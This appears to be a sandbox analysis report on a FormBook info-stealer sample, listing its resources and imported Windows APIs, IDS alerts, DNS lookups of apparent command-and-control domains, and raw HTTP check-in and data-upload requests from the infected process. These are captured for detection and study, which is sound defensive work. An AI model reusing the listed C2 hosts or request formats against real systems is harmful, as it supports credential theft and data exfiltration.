RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x4e8f0 | data | | | 1.0003294217095122
RT_GROUP_ICON | 0x11e0a8 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11e120 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x11e134 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x11e148 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x11e15c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11e238 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T18:47:36.565238+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49758 | 84.32.84.32 | 80 | TCP
2024-12-10T18:47:36.565238+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49756 | 84.32.84.32 | 80 | TCP
2024-12-10T18:47:36.565238+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49757 | 84.32.84.32 | 80 | TCP
2024-12-10T18:48:27.548312+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49755 | 162.251.95.62 | 80 | TCP
2024-12-10T18:48:51.684040+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49759 | 84.32.84.32 | 80 | TCP
2024-12-10T18:48:57.993871+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49760 | 104.21.64.208 | 80 | TCP
2024-12-10T18:49:00.644650+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49761 | 104.21.64.208 | 80 | TCP
2024-12-10T18:49:03.537440+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49762 | 104.21.64.208 | 80 | TCP
2024-12-10T18:49:06.152353+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49763 | 104.21.64.208 | 80 | TCP
2024-12-10T18:49:11.680216+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49764 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:14.391627+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49765 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:17.087577+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49766 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:19.805288+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49767 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:25.252644+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49768 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:27.908725+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49769 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:30.565792+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49770 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:33.220855+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49771 | 199.59.243.227 | 80 | TCP
2024-12-10T18:49:38.853215+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49772 | 209.74.79.41 | 80 | TCP
2024-12-10T18:49:41.539486+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49773 | 209.74.79.41 | 80 | TCP
2024-12-10T18:49:44.288907+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49774 | 209.74.79.41 | 80 | TCP
2024-12-10T18:49:47.014958+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49775 | 209.74.79.41 | 80 | TCP
2024-12-10T18:49:53.406218+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49776 | 172.67.128.109 | 80 | TCP
2024-12-10T18:49:56.072312+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49777 | 172.67.128.109 | 80 | TCP
2024-12-10T18:49:58.877370+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49778 | 172.67.128.109 | 80 | TCP
2024-12-10T18:50:01.276604+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49779 | 172.67.128.109 | 80 | TCP
2024-12-10T18:50:08.290020+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49780 | 47.83.1.90 | 80 | TCP
2024-12-10T18:50:10.678387+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49781 | 47.83.1.90 | 80 | TCP
2024-12-10T18:50:13.527999+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49782 | 47.83.1.90 | 80 | TCP
2024-12-10T18:50:16.356830+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49783 | 47.83.1.90 | 80 | TCP
                                                        Dec 10, 2024 18:49:47.014662027 CET8049775209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:47.014683008 CET8049775209.74.79.41192.168.11.20
                                                        Dec 10, 2024 18:49:47.014957905 CET4977580192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:47.016772032 CET4977580192.168.11.20209.74.79.41
                                                        Dec 10, 2024 18:49:47.185715914 CET8049775209.74.79.41192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 18:48:26.337469101 CET | 192.168.11.20 | 1.1.1.1 | 0xac26 | Standard query (0) | www.y6h6kn.top | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:48:42.592319012 CET | 192.168.11.20 | 1.1.1.1 | 0x27f9 | Standard query (0) | www.thesnusgang.fun | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:48:57.026803970 CET | 192.168.11.20 | 1.1.1.1 | 0x7ca | Standard query (0) | www.telepzow.fit | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:49:11.164047956 CET | 192.168.11.20 | 1.1.1.1 | 0x25e8 | Standard query (0) | www.dnft.immo | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:49:24.817354918 CET | 192.168.11.20 | 1.1.1.1 | 0x528f | Standard query (0) | www.deadshoy.tech | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:49:38.236323118 CET | 192.168.11.20 | 1.1.1.1 | 0x5b5e | Standard query (0) | www.freshteps.life | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:49:52.499034882 CET | 192.168.11.20 | 1.1.1.1 | 0x36e7 | Standard query (0) | www.cifasnc.info | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:50:06.292690039 CET | 192.168.11.20 | 1.1.1.1 | 0x7699 | Standard query (0) | www.cruycq.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 18:48:26.917366028 CET | 1.1.1.1 | 192.168.11.20 | 0xac26 | No error (0) | www.y6h6kn.top | - | 162.251.95.62 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:48:26.917366028 CET | 1.1.1.1 | 192.168.11.20 | 0xac26 | No error (0) | www.y6h6kn.top | - | 103.23.149.28 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:48:42.792468071 CET | 1.1.1.1 | 192.168.11.20 | 0x27f9 | No error (0) | www.thesnusgang.fun | thesnusgang.fun | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 18:48:42.792468071 CET | 1.1.1.1 | 192.168.11.20 | 0x27f9 | No error (0) | thesnusgang.fun | - | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:48:57.180835962 CET | 1.1.1.1 | 192.168.11.20 | 0x7ca | No error (0) | www.telepzow.fit | - | 104.21.64.208 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:48:57.180835962 CET | 1.1.1.1 | 192.168.11.20 | 0x7ca | No error (0) | www.telepzow.fit | - | 172.67.155.214 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:49:11.414119005 CET | 1.1.1.1 | 192.168.11.20 | 0x25e8 | No error (0) | www.dnft.immo | 94950.bodis.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 18:49:11.414119005 CET | 1.1.1.1 | 192.168.11.20 | 0x25e8 | No error (0) | 94950.bodis.com | - | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:49:24.986771107 CET | 1.1.1.1 | 192.168.11.20 | 0x528f | No error (0) | www.deadshoy.tech | - | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:49:38.473293066 CET | 1.1.1.1 | 192.168.11.20 | 0x5b5e | No error (0) | www.freshteps.life | - | 209.74.79.41 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:49:52.649940014 CET | 1.1.1.1 | 192.168.11.20 | 0x36e7 | No error (0) | www.cifasnc.info | - | 172.67.128.109 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:49:52.649940014 CET | 1.1.1.1 | 192.168.11.20 | 0x36e7 | No error (0) | www.cifasnc.info | - | 104.21.1.251 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 18:50:06.456468105 CET | 1.1.1.1 | 192.168.11.20 | 0x7699 | No error (0) | www.cruycq.info | - | 47.83.1.90 | A (IP address) | IN (0x0001) | false
                                                        • www.y6h6kn.top
                                                        • www.thesnusgang.fun
                                                        • www.telepzow.fit
                                                        • www.dnft.immo
                                                        • www.deadshoy.tech
                                                        • www.freshteps.life
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49755 | 162.251.95.62 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 18:48:27.238774061 CET | 440 | OUT | GET /jv64/?QT=0rgj4Y9sgnjazUN8mpbMdGhoFe+HkDbNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7y+Y5ieOqpPsPHRlC6dNFB2EQ+kIpm+R3QUE=&LLp=-2JPqdjXxxH4 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.y6h6kn.top
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Dec 10, 2024 18:48:27.547852993 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 17:48:27 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "674427dd-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49756 | 84.32.84.32 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 18:48:43.057383060 CET | 714 | OUT | POST /z4qr/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Length: 199
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Host: www.thesnusgang.fun
Origin: http://www.thesnusgang.fun
Referer: http://www.thesnusgang.fun/z4qr/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Data Ascii: QT=4bxAs9WIczJnjexwGp0veWmP2CB7tFWwaijD73KLaEH/5AWvoSyzaa8zv7WbOiHtIp0Btk0S9vpLpoqk0tgZvSWKdZv3uQIr68T2a1aQXdF7FlLS3Ec+tkx7wNgB7kOIUDw4wMggp/HN0+u1qH1YuDp+v8wewVWBYmnEwisBacg6Hw34pTfXu+NDYX7Pfj8SZA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49757 | 84.32.84.32 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 18:48:45.839210987 CET | 734 | OUT | POST /z4qr/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Length: 219
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Host: www.thesnusgang.fun
Origin: http://www.thesnusgang.fun
Referer: http://www.thesnusgang.fun/z4qr/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Data Ascii: QT=4bxAs9WIczJni8lwEKcvSmmO6iB7jlXYaivD72+ba3z/5i+vpTyzda8znbWaDCHzIpoWtnsS9rJLppak3a9rvCWEQ5vxzAIr68T2a1n9Xdt7F2jSlVc9ukx8xNgB2EPBUDwawOYGp9vN06q1kzhbgzp4hcxC9Qv1BmSxgQsJT8oBPG6i0hrzttRxcnCndh9JEPpcAcG0cflW6/BgSkMzIa0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49758 | 84.32.84.32 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 18:48:48.639307976 CET | 5156 | OUT | POST /z4qr/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Length: 7367
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Host: www.thesnusgang.fun
Origin: http://www.thesnusgang.fun
Referer: http://www.thesnusgang.fun/z4qr/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49759 | 84.32.84.32 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 18:48:51.429709911 CET | 445 | OUT | GET /z4qr/?QT=1ZZgvIaiKHhduep+YaBDSgnAwH9SiWnEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jtTWbac3F9TEassXJax+dUsBKSmbq0EscsQY=&LLp=-2JPqdjXxxH4 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.thesnusgang.fun
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Dec 10, 2024 18:48:51.683777094 CET | 536 | IN | HTTP/1.1 200 OK
Date: Tue, 10 Dec 2024 17:48:51 GMT
Content-Type: text/html
Content-Length: 9973
Connection: close
Vary: Accept-Encoding
Server: hcdn
alt-svc: h3=":443"; ma=86400
x-hcdn-request-id: 03bb24cb1d637e9a0594e010c590a3bd-asc-edge5
Expires: Tue, 10 Dec 2024 17:48:50 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinge


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49760 | 104.21.64.208 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 18:48:57.336606979 CET | 705 | OUT | POST /oizn/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
